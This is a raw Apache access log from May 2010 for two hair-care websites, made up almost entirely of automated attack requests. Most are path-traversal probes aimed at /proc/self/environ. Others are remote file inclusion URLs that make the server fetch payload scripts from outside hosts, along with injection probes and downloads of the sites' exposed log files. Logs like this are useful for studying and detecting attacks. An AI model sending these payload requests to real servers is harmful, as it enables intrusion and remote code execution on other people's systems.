72.233.57.242 - - [02/May/2010:22:36:36 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:22:36:36 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:22:36:36 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:22:36:46 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:22:38:09 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:22:38:10 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:22:38:10 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:22:38:20 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:22:38:20 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:22:38:20 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.45.178.42 - - [02/May/2010:22:38:46 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:22:44:12 -0700] "GET /logs/access.log%20%20///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:22:44:12 -0700] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:22:44:12 -0700] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.72.242.242 - - [02/May/2010:22:46:20 -0700] "GET /logs/access_100426.log/?board_skin_path=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
202.72.242.242 - - [02/May/2010:22:46:21 -0700] "GET /?board_skin_path=' HTTP/1.1" 200 926 "-" "libwww-perl/5.79" "growlonghairfast.com"
202.72.242.242 - - [02/May/2010:22:46:21 -0700] "GET /logs/?board_skin_path=' HTTP/1.1" 200 5085 "-" "libwww-perl/5.79" "growlonghairfast.com"
119.235.237.18 - - [02/May/2010:22:50:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11099 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
72.233.57.242 - - [02/May/2010:22:52:06 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:52:06 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:52:07 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:52:07 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:52:07 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:52:07 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:52:33 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:52:33 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:52:33 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:52:46 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:52:46 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:52:46 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:22:54:03 -0700] "GET /logs/access.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
184.73.37.224 - - [02/May/2010:22:56:05 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.37.224 - - [02/May/2010:22:56:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12812 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:58:18 -0700] "GET /logs/access_100125.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:58:18 -0700] "GET /logs/access_100125.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:58:59 -0700] "GET /logs/access_100125.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:59:01 -0700] "GET /logs/access_100125.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:23:01:18 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:23:01:18 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:23:01:18 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:23:01:23 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:23:01:23 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:23:01:23 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:01:41 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:01:41 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:01:41 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:01:42 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:01:42 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:23:01:42 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
84.40.30.37 - - [02/May/2010:23:11:26 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:11:26 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:11:29 -0700] "GET /logs/access_100208.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:12:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:12:52 -0700] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:12:52 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:13:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:13:00 -0700] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [02/May/2010:23:13:01 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.250.57.232 - - [02/May/2010:23:13:31 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Wget/1.11.4" "www.freehairsecrets.com"
211.232.85.247 - - [02/May/2010:23:17:38 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:17:38 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:17:38 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:18:46 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:18:46 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:18:46 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.250.57.232 - - [02/May/2010:23:18:51 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Wget/1.11.4" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:23:19:01 -0700] "GET /logs/access.log/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
207.45.178.42 - - [02/May/2010:23:19:01 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
207.45.178.42 - - [02/May/2010:23:19:01 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
211.232.85.247 - - [02/May/2010:23:19:53 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:19:53 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:19:54 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.22 - - [02/May/2010:23:23:29 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.22 - - [02/May/2010:23:23:29 -0700] "GET /logs/access_090907.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:23:34 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [02/May/2010:23:23:34 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [02/May/2010:23:23:34 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [02/May/2010:23:25:08 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [02/May/2010:23:25:09 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [02/May/2010:23:25:09 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.232.85.247 - - [02/May/2010:23:28:23 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:28:23 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:28:23 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:23:30:12 -0700] "GET /logs/access_100412.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:33:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:33:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:33:20 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:33:52 -0700] "GET /logs/access_100426.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:33:52 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:33:52 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:38:09 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:38:50 -0700] "GET /logs/access_100426.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:41:30 -0700] "GET /include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:41:30 -0700] "GET /logs//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:41:30 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:41:48 -0700] "GET /logs//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:41:48 -0700] "GET /include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.49.100.254 - - [02/May/2010:23:41:49 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:42:24 -0700] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:42:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:42:30 -0700] "GET /logs/access_100426.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:42:30 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:42:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [02/May/2010:23:42:58 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
